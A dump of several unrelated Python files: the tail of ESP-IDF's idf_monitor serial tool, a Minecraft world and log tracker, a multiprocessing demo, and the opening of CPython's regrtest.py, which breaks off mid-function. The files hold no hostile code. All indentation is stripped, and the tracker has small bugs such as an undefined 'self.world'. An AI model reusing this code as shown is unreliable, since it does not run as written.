self._pressed_menu_key = False
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no futher data is received in the next short period
# of time then the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
# the last line. This is fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._output_enabled and (self._force_line_print or self._line_matcher.match(line)):
self.console.write_bytes(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But after some time when we didn't received it we need
# to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part)):
self._force_line_print = True;
if self._output_enabled:
self.console.write_bytes(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [ CTRL_H, 'h', 'H', '?' ]:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
elif c == CTRL_Y: # Toggle output display
self.output_toggle()
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
# to fast trigger pause without press menu key
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {make:7} Run 'make flash' to build & flash
--- {appmake:7} Run 'make app-flash to build & flash app
--- {output:7} Toggle output display
--- {pause:7} Reset target into bootloader to pause app via RTS line
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
make=key_description(CTRL_F),
appmake=key_description(CTRL_A),
output=key_description(CTRL_Y),
pause=key_description(CTRL_P),
)
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to run 'make flash'.
--- Press {} to run 'make app-flash'.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [ CTRL_F, CTRL_A ]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
yellow_print("Running make %s..." % target)
p = subprocess.Popen([self.make,
target ])
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
translation = subprocess.check_output(
["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr],
cwd=".")
if not "?? ??:0" in translation:
yellow_print(translation)
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(p) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
process = subprocess.Popen(["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file], cwd=".")
process.wait()
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output):
self.output = output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
for b in data:
l = len(self.matched)
if b == '\033': # ESC
self.matched = b
elif (l == 1 and b == '[') or (1 < l < 7):
self.matched += b
if self.matched == ANSI_NORMAL: # reset console
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
Trackers.py
|
import threading
import os
import time
import json
from python_nbt import nbt
class SavesTracker:
def __init__(self, path):
self.path = path
self.running = True
self.mtime = 0
self.latestWorld = None
self.savesLen = 0
self.worldList = []
self.newWorldCalls = []
self.updateWorldList()
threading.Thread(target=self.loop).start()
def stop(self):
self.running = False
def addNewWorldCall(self, func, args=""):
self.newWorldCalls.append((func, args))
def newWorldEvent(self):
for i in self.newWorldCalls:
i[0](*i[1])
def getIGT(self, world=None):
try:
if world is None:
world = self.latestWorld
if world is None:
return 0
else:
statsPath = os.path.join(self.path, world, "stats")
statsFiles = os.listdir(statsPath)
if len(statsFiles) > 0:
with open(os.path.join(statsPath, statsFiles[0]), "r") as statsFile:
statsJson = json.load(statsFile)
statsFile.close()
try:
return statsJson["stats"]["minecraft:custom"]["minecraft:play_one_minute"]/20
except:
try:
return statsJson["stat.playOneMinute"]/20
except:
return statsJson["stats"]["minecraft:custom"]["minecraft:play_time"]/20
else:
return 0
except:
return 0
def getAltIGT(self, world=None):
try:
if world == None:
world = self.latestWorld
if world is None:
return 0
else:
levelDatPath = os.path.join(self.path, world, "level.dat")
levelDatNBT = nbt.read_from_nbt_file(levelDatPath)["Data"]
return levelDatNBT["Time"].value/20
except:
return 0
def getKills(self, mobName, world=None):
try:
if world == None:
world = self.latestWorld
if self.world is None:
return 0
else:
statsPath = os.path.join(self.path, world, "stats")
statsFiles = os.listdir(statsPath)
if len(statsFiles) > 0:
with open(os.path.join(statsPath, statsFiles[0]), "r") as statsFile:
statsJson = json.load(statsFile)
statsFile.close()
try:
return statsJson["stats"]["minecraft:killed"][f"minecraft:{mobName.lower()}"]
except:
return statsJson[f"stat.killEntity.{mobName[0].upper()+mobName[1:].lower()}"]
else:
return 0
except:
return 0
def updateWorldList(self):
oldList = self.worldList[:]
self.worldList = []
newLatestWorld = None
max = 0
if os.path.isdir(self.path):
for worldName in os.listdir(self.path):
if os.path.isfile(os.path.join(self.path, worldName, "level.dat")):
self.worldList.append(worldName)
wtime = os.path.getctime(
os.path.join(self.path, worldName))
if wtime > max:
newLatestWorld = worldName
max = wtime
if worldName not in oldList:
self.newWorldEvent()
else:
threading.Thread(target=self.waitForWorld,
args=(worldName,)).start()
self.latestWorld = newLatestWorld
def waitForWorld(self, worldName):
while self.running:
time.sleep(0.5)
if not os.path.isdir(os.path.join(self.path, worldName)):
return
elif os.path.isfile(os.path.join(self.path, worldName, "level.dat")):
self.updateWorldList()
return
def loop(self):
while self.running:
time.sleep(0.1)
if os.path.isdir(self.path):
newlen = len(os.listdir(self.path))
newmtime = os.path.getmtime(self.path)
if self.mtime != newmtime or self.savesLen != newlen:
self.savesLen = newlen
self.mtime = newmtime
self.updateWorldList()
class LogsTracker:
def __init__(self, path):
self.path = path
self.logPath = os.path.join(os.path.join(self.path, "latest.log"))
self.running = True
self.hasThread = False
def cancel(self):
self.running = False
stop = cancel
def refresh(self):
self.start = time.time()
def listenUntilWorldStart(self, timeout, responseCall, args=""):
if not self.hasThread:
threading.Thread(target=self._listenThread,
args=(timeout, responseCall, args)).start()
else:
self.refresh()
def _listenThread(self, timeout, responseCall, args):
self.hasThread = True
try:
if os.path.isfile(self.logPath):
self.start = time.time()
self.running = True
lineLen = len(self.getLines())
mtime = os.path.getmtime(self.logPath)
while self.running and time.time() - self.start < timeout:
time.sleep(0.1)
newmtime = os.path.getmtime(self.logPath)
if mtime != newmtime:
mtime - newmtime
lines = self.getLines()
newLen = len(lines)
if newLen > lineLen:
for line in lines[lineLen: newLen]:
if "logged in with entity id" in line:
responseCall(*args)
lineLen = newLen
else:
print("latest.log not found")
except ValueError:
print(ValueError)
self.hasThread = False
self.running = False
def getLines(self):
with open(self.logPath) as logFile:
lines = [i.rstrip() for i in logFile.readlines()]
logFile.close()
return lines
|
example2.py
|
#!/usr/bin/env python
import multiprocessing
import time
def worker():
print('new worker')
time.sleep(0.5)
print('end of worker')
t0 = multiprocessing.Process(target = worker)
t1 = multiprocessing.Process()
t0.daemon = t1.daemon = True
t1.run = worker
print('before')
t0.start()
time.sleep(0.1)
t1.start()
print('after')
|
regrtest.py
|
#! /usr/bin/python3.3
"""
Usage:
python -m test [options] [test_name1 [test_name2 ...]]
python path/to/Lib/test/regrtest.py [options] [test_name1 [test_name2 ...]]
If no arguments or options are provided, finds all files matching
the pattern "test_*" in the Lib/test subdirectory and runs
them in alphabetical order (but see -M and -u, below, for exceptions).
For more rigorous testing, it is useful to use the following
command line:
python -E -Wd -m test [options] [test_name1 ...]
Options:
-h/--help -- print this text and exit
--timeout TIMEOUT
-- dump the traceback and exit if a test takes more
than TIMEOUT seconds; disabled if TIMEOUT is negative
or equals to zero
--wait -- wait for user input, e.g., allow a debugger to be attached
Verbosity
-v/--verbose -- run tests in verbose mode with output to stdout
-w/--verbose2 -- re-run failed tests in verbose mode
-W/--verbose3 -- display test output on failure
-d/--debug -- print traceback for failed tests
-q/--quiet -- no output unless one or more tests fail
-o/--slow -- print the slowest 10 tests
--header -- print header with interpreter info
Selecting tests
-r/--randomize -- randomize test execution order (see below)
--randseed -- pass a random seed to reproduce a previous random run
-f/--fromfile -- read names of tests to run from a file (see below)
-x/--exclude -- arguments are tests to *exclude*
-s/--single -- single step through a set of tests (see below)
-m/--match PAT -- match test cases and methods with glob pattern PAT
-G/--failfast -- fail as soon as a test fails (only with -v or -W)
-u/--use RES1,RES2,...
-- specify which special resource intensive tests to run
-M/--memlimit LIMIT
-- run very large memory-consuming tests
--testdir DIR
-- execute test files in the specified directory (instead
of the Python stdlib test suite)
Special runs
-l/--findleaks -- if GC is available detect tests that leak memory
-L/--runleaks -- run the leaks(1) command just before exit
-R/--huntrleaks RUNCOUNTS
-- search for reference leaks (needs debug build, v. slow)
-j/--multiprocess PROCESSES
-- run PROCESSES processes at once
-T/--coverage -- turn on code coverage tracing using the trace module
-D/--coverdir DIRECTORY
-- Directory where coverage files are put
-N/--nocoverdir -- Put coverage files alongside modules
-t/--threshold THRESHOLD
-- call gc.set_threshold(THRESHOLD)
-n/--nowindows -- suppress error message boxes on Windows
-F/--forever -- run the specified tests in a loop, until an error happens
Additional Option Details:
-r randomizes test execution order. You can use --randseed=int to provide a
int seed value for the randomizer; this is useful for reproducing troublesome
test orders.
-s On the first invocation of regrtest using -s, the first test file found
or the first test file given on the command line is run, and the name of
the next test is recorded in a file named pynexttest. If run from the
Python build directory, pynexttest is located in the 'build' subdirectory,
otherwise it is located in tempfile.gettempdir(). On subsequent runs,
the test in pynexttest is run, and the next test is written to pynexttest.
When the last test has been run, pynexttest is deleted. In this way it
is possible to single step through the test files. This is useful when
doing memory analysis on the Python interpreter, which process tends to
consume too many resources to run the full regression test non-stop.
-S is used to continue running tests after an aborted run. It will
maintain the order a standard run (ie, this assumes -r is not used).
This is useful after the tests have prematurely stopped for some external
reason and you want to start running from where you left off rather
than starting from the beginning.
-f reads the names of tests from the file given as f's argument, one
or more test names per line. Whitespace is ignored. Blank lines and
lines beginning with '#' are ignored. This is especially useful for
whittling down failures involving interactions among tests.
-L causes the leaks(1) command to be run just before exit if it exists.
leaks(1) is available on Mac OS X and presumably on some other
FreeBSD-derived systems.
-R runs each test several times and examines sys.gettotalrefcount() to
see if the test appears to be leaking references. The argument should
be of the form stab:run:fname where 'stab' is the number of times the
test is run to let gettotalrefcount settle down, 'run' is the number
of times further it is run and 'fname' is the name of the file the
reports are written to. These parameters all have defaults (5, 4 and
"reflog.txt" respectively), and the minimal invocation is '-R :'.
-M runs tests that require an exorbitant amount of memory. These tests
typically try to ascertain containers keep working when containing more than
2 billion objects, which only works on 64-bit systems. There are also some
tests that try to exhaust the address space of the process, which only makes
sense on 32-bit systems with at least 2Gb of memory. The passed-in memlimit,
which is a string in the form of '2.5Gb', determines howmuch memory the
tests will limit themselves to (but they may go slightly over.) The number
shouldn't be more memory than the machine has (including swap memory). You
should also keep in mind that swap memory is generally much, much slower
than RAM, and setting memlimit to all available RAM or higher will heavily
tax the machine. On the other hand, it is no use running these tests with a
limit of less than 2.5Gb, and many require more than 20Gb. Tests that expect
to use more than memlimit memory will be skipped. The big-memory tests
generally run very, very long.
-u is used to specify which special resource intensive tests to run,
such as those requiring large file support or network connectivity.
The argument is a comma-separated list of words indicating the
resources to test. Currently only the following are defined:
all - Enable all special resources.
none - Disable all special resources (this is the default).
audio - Tests that use the audio device. (There are known
cases of broken audio drivers that can crash Python or
even the Linux kernel.)
curses - Tests that use curses and will modify the terminal's
state and output modes.
largefile - It is okay to run some test that may create huge
files. These tests can take a long time and may
consume >2GB of disk space temporarily.
network - It is okay to run tests that use external network
resource, e.g. testing SSL support for sockets.
decimal - Test the decimal module against a large suite that
verifies compliance with standards.
cpu - Used for certain CPU-heavy tests.
subprocess Run all tests for the subprocess module.
urlfetch - It is okay to download files required on testing.
gui - Run tests that require a running GUI.
To enable all resources except one, use '-uall,-<resource>'. For
example, to run all the tests except for the gui tests, give the
option '-uall,-gui'.
"""
# We import importlib *ASAP* in order to test #15386
import importlib
import builtins
import faulthandler
import getopt
import io
import json
import logging
import os
import platform
import random
import re
import shutil
import signal
import sys
import sysconfig
import tempfile
import time
import traceback
import unittest
import warnings
from inspect import isabstract
try:
import threading
except ImportError:
threading = None
try:
import multiprocessing.process
except ImportError:
multiprocessing = None
# Some times __path__ and __file__ are not absolute (e.g. while running from
# Lib/) and, if we change the CWD to run the tests in a temporary dir, some
# imports might fail. This affects only the modules imported before os.chdir().
# These modules are searched first in sys.path[0] (so '' -- the CWD) and if
# they are found in the CWD their __file__ and __path__ will be relative (this
# happens before the chdir). All the modules imported after the chdir, are
# not found in the CWD, and since the other paths in sys.path[1:] are absolute
# (site.py absolutize them), the __file__ and __path__ will be absolute too.
# Therefore it is necessary to absolutize manually the __file__ and __path__ of
# the packages to prevent later imports to fail when the CWD is different.
for module in sys.modules.values():
if hasattr(module, '__path__'):
module.__path__ = [os.path.abspath(path) for path in module.__path__]
if hasattr(module, '__file__'):
module.__file__ = os.path.abspath(module.__file__)
# MacOSX (a.k.a. Darwin) has a default stack size that is too small
# for deeply recursive regular expressions. We see this as crashes in
# the Python test suite when running test_re.py and test_sre.py. The
# fix is to set the stack limit to 2048.
# This approach may also be useful for other Unixy platforms that
# suffer from small default stack limits.
if sys.platform == 'darwin':
try:
import resource
except ImportError:
pass
else:
soft, hard = resource.getrlimit(resource.RLIMIT_STACK)
newsoft = min(hard, max(soft, 1024*2048))
resource.setrlimit(resource.RLIMIT_STACK, (newsoft, hard))
# Test result constants.
PASSED = 1
FAILED = 0
ENV_CHANGED = -1
SKIPPED = -2
RESOURCE_DENIED = -3
INTERRUPTED = -4
CHILD_ERROR = -5 # error in a child process
from test import support
RESOURCE_NAMES = ('audio', 'curses', 'largefile', 'network',
'decimal', 'cpu', 'subprocess', 'urlfetch', 'gui')
TEMPDIR = os.path.abspath(tempfile.gettempdir())
def usage(msg):
print(msg, file=sys.stderr)
print("Use --help for usage", file=sys.stderr)
sys.exit(2)
def main(tests=None, testdir=None, verbose=0, quiet=False,
exclude=False, single=0, randomize=False, fromfile=None,
findleaks=False, use_resources=None, trace=False, coverdir='coverage',
runleaks=False, huntrleaks=False, verbose2=False, print_slow=False,
random_seed=None, use_mp=None, verbose3=False, forever=False,
header=False, failfast=False, match_tests=None):
"""Execute a test suite.
This also parses command-line options and modifies its behavior
accordingly.
tests -- a list of strings containing test names (optional)
testdir -- the directory in which to look for tests (optional)
Users other than the Python test suite will certainly want to
specify testdir; if it's omitted, the directory containing the
Python test suite is searched for.
If the tests argument is omitted, the tests listed on the
command-line will be used. If that's empty, too, then all *.py
files beginning with test_ will be used.
The other default arguments (verbose, quiet, exclude,
single, randomize, findleaks, use_resources, trace, coverdir,
print_slow, and random_seed) allow programmers calling main()
directly to set the values that would normally be set by flags
on the command line.
"""
# Display the Python traceback on fatal errors (e.g. segfault)
faulthandler.enable(all_threads=True)
# Display the Python traceback on SIGALRM or SIGUSR1 signal
signals = []
if hasattr(signal, 'SIGALRM'):
signals.append(signal.SIGALRM)
if hasattr(signal, 'SIGUSR1'):
signals.append(signal.SIGUSR1)
for signum in signals:
faulthandler.register(signum, chain=True)
replace_stdout()
support.record_original_stdout(sys.stdout)
try:
opts, args = getopt.getopt(sys.argv[1:], 'hvqxsoS:rf:lu:t:TD:NLR:FdwWM:nj:Gm:',
['help', 'verbose', 'verbose2', 'verbose3', 'quiet',
'exclude', 'single', 'slow', 'randomize', 'fromfile=', 'findleaks',
'use=', 'threshold=', 'coverdir=', 'nocoverdir',
'runleaks', 'huntrleaks=', 'memlimit=', 'randseed=',
'multiprocess=', 'coverage', 'slaveargs=', 'forever', 'debug',
'start=', 'nowindows', 'header', 'testdir=', 'timeout=', 'wait',
'failfast', 'match=', 'next='])
except getopt.error as msg:
usage(msg)
# Defaults
if random_seed is None:
random_seed = random.randrange(10000000)
if use_resources is None:
use_resources = []
debug = False
start = None
timeout = None
for o, a in opts:
if o in ('-h', '--help'):
print(__doc__)
return
elif o in ('-v', '--verbose'):
verbose += 1
elif o in ('-w', '--verbose2'):
verbose2 = True
elif o in ('-d', '--debug'):
debug = True
elif o in ('-W', '--verbose3'):
verbose3 = True
elif o in ('-G', '--failfast'):
failfast = True
elif o in ('-q', '--quiet'):
quiet = True;
verbose = 0
elif o in ('-x', '--exclude'):
exclude = True
elif o in ('-S', '--start'):
start = a
elif o in ('-s', '--single'):
single = 1
elif o == '--next':
single = int(a)
elif o in ('-o', '--slow'):
print_slow = True
elif o in ('-r', '--randomize'):
randomize = True
elif o == '--randseed':
random_seed = int(a)
elif o in ('-f', '--fromfile'):
fromfile = a
elif o in ('-m', '--match'):
match_tests = a
elif o in ('-l', '--findleaks'):
findleaks = True
elif o in ('-L', '--runleaks'):
runleaks = True
elif o in ('-t', '--threshold'):
import gc
gc.set_threshold(int(a))
elif o in ('-T', '--coverage'):
trace = True
elif o in ('-D', '--coverdir'):
# CWD is replaced with a temporary dir before calling main(), so we
# need join it with the saved CWD so it goes where the user expects.
coverdir = os.path.join(support.SAVEDCWD, a)
elif o in ('-N', '--nocoverdir'):
coverdir = None
elif o in ('-R', '--huntrleaks'):
huntrleaks = a.split(':')
if len(huntrleaks) not in (2, 3):
print(a, huntrleaks)
usage('-R takes 2 or 3 colon-separated arguments')
if not huntrleaks[0]:
huntrleaks[0] = 5
else:
huntrleaks[0] = int(huntrleaks[0])
if not huntrleaks[1]:
huntrleaks[1] = 4
else:
huntrleaks[1] = int(huntrleaks[1])
if len(huntrleaks) == 2 or not huntrleaks[2]:
huntrleaks[2:] = ["reflog.txt"]
# Avoid false positives due to various caches
# filling slowly with random data:
warm_caches()
elif o in ('-M', '--memlimit'):
support.set_memlimit(a)
elif o in ('-u', '--use'):
u = [x.lower() for x in a.split(',')]
for r in u:
if r == 'all':
use_resources[:] = RESOURCE_NAMES
continue
if r == 'none':
del use_resources[:]
continue
remove = False
if r[0] == '-':
remove = True
r = r[1:]
if r not in RESOURCE_NAMES:
usage('Invalid -u/--use option: ' + a)
if remove:
if r in use_resources:
use_resources.remove(r)
elif r not in use_resources:
use_resources.append(r)
elif o in ('-n', '--nowindows'):
import msvcrt
msvcrt.SetErrorMode(msvcrt.SEM_FAILCRITICALERRORS|
msvcrt.SEM_NOALIGNMENTFAULTEXCEPT|
msvcrt.SEM_NOGPFAULTERRORBOX|
msvcrt.SEM_NOOPENFILEERRORBOX)
try:
msvcrt.CrtSetReportMode
except AttributeError:
# release build
pass
else:
for m in [msvcrt.CRT_WARN, msvcrt.CRT_ERROR, msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(m, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(m, msvcrt.CRTDBG_FILE_STDERR)
elif o in ('-F', '--forever'):
forever = True
elif o in ('-j', '--multiprocess'):
use_mp = int(a)
if use_mp <= 0:
try:
import multiprocessing
# Use all cores + extras for tests that like to sleep
use_mp = 2 + multiprocessing.cpu_count()
except (ImportError, NotImplementedError):
use_mp = 3
if use_mp == 1:
use_mp = None
elif o == '--header':
header = True
elif o == '--slaveargs':
args, kwargs = json.loads(a)
try:
result = runtest(*args, **kwargs)
except KeyboardInterrupt:
result = INTERRUPTED, ''
except BaseException as e:
traceback.print_exc()
result = CHILD_ERROR, str(e)
sys.stdout.flush()
print() # Force a newline (just in case)
print(json.dumps(result))
sys.exit(0)
elif o == '--testdir':
# CWD is replaced with a temporary dir before calling main(), so we
# join it with the saved CWD so it ends up where the user expects.
testdir = os.path.join(support.SAVEDCWD, a)
elif o == '--timeout':
if hasattr(faulthandler, 'dump_tracebacks_later'):
timeout = float(a)
if timeout <= 0:
timeout = None
else:
print("Warning: The timeout option requires "
"faulthandler.dump_tracebacks_later")
timeout = None
elif o == '--wait':
input("Press any key to continue...")
else:
print(("No handler for option {}. Please report this as a bug "
"at http://bugs.python.org.").format(o), file=sys.stderr)
sys.exit(1)
if single and fromfile:
usage("-s and -f don't go together!")
if use_mp and trace:
usage("-T and -j don't go together!")
if use_mp and findleaks:
usage("-l and -j don't go together!")
if use_mp and support.max_memuse:
usage("-M and -j don't go together!")
if failfast and not (verbose or verbose3):
usage("-G/--failfast needs either -v or -W")
good = []
bad = []
skipped = []
resource_denieds = []
environment_changed = []
interrupted = False
if findleaks:
try:
import gc
except ImportError:
print('No GC available, disabling findleaks.')
findleaks = False
else:
# Uncomment the line below to report garbage that is not
# freeable by reference counting alone. By default only
# garbage that is not collectable by the GC is reported.
#gc.set_debug(gc.DEBUG_SAVEALL)
found_garbage = []
if single:
filename = os.path.join(TEMPDIR, 'pynexttest')
try:
fp = open(filename, 'r')
